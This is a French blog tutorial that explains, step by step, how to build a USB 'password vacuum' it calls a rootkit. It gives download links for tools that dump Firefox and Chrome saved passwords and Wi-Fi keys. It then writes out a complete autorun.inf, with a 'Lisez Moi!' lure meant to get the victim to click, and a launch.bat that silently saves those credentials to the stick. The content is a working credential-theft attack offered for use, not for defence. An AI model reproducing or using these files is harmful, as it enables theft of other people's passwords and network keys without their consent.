Tuto : Créer un aspirateur de mots de passe


Pour mon premier article,  je vais vous apprendre à fabriquer votre propre RootKit. Alors, tout d’abord, qu’est-ce qu’un RootKit?

Pour faire simple, un RK c’est un genre de malware,  conçu pour infecter un PC. Il va ainsi permettre à un pirate d’installer par la suite plusieurs logiciels, comme des logiciels de contrôle à distance… etc. Ici, notre RK sera un aspirateur à mot de passe. Bien évidemment, il existe des multitudes de RK différents, et j’en ai donc sélectionné 3.

 

La première chose à faire sera de télécharger les 3 fichiers suivant :

 

PasswordFox : c’est un outil qui permet d’afficher les noms d’utilisateur et mots de passe stockés dans Mozilla Firefox.  Pour chaque mot de passe renseigné, l’information suivante est affichée: Record Index, site web, nom d’utilisateur, mot de passe.

http://www.nirsoft.net/utils/passwordfox.html

ChromePass : c’est un outil qui permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et heure de création.

http://www.nirsoft.net/utils/chromepass.html

WirelessKeyView : il va récupérer toutes les clés réseau Wi-Fi/ mots de passe (WEP / WPA) stockés dans votre ordinateur.

http://www.nirsoft.net/utils/wireless_key.html

 

Ensuite, on va copier les exécutables sur notre clé usb. La prochaine étape consiste à créer nos script, afin d’automatiser le lancement de ces logiciels.

On va donc ouvrir le bloc-note, ou tout autre EDI et écrire :

[autorun]

open = launch.bat

ACTION = Lisez Moi!

On enregistre le fichier sous la racine de la clé usb sous le nom autorun.inf.

Alors, que va faire ce code? Tout simplement, on va pointer sur le fichier launch.bat, pour que celui si s’ouvre, quand l’utilisateur clique sur « Lisez Moi! ». Vous l’aurez compris, vous pouvez remplacer « Lisez Moi! » par n’importe quel texte de votre choix!

 

On va à nouveau ouvrir notre bloc-note, et créer notre fichier .bat :

@echo off

start ChromePass.exe /stext ChromePass.txt

start PasswordFox.exe /stext PasswordFox.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

On enregistre encore une fois sous la racine de notre clé, sous le nom de launch.bat.  Ici, comme je le dit plus haut, on va automatiser l’ouverture des 3 logiciels espions, pour ne pas le faire à la main. Evidemment, ici il n’y en a que 3, mais imaginez comme cela peut être pratique si vous désirez lancer 20 logiciels à la fois pour scanner une machine!

 

Maintenant, il ne reste qu’à connecter la clé sur un pc et cliquer sur « Lisez Moi! » quand l’autorun est lancé, et on va voir apparaitre des fichiers txt sur la racine de notre clé, qui sont les résultats des test. La dernière chose à savoir, est qu’à chaque fois que vous allez faire cette opération, les fichiers .txt seront remplacés par les nouveaux résultats !

Share and Enjoy

  • Facebook
  • Twitter
  • Google Plus
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

You may also like...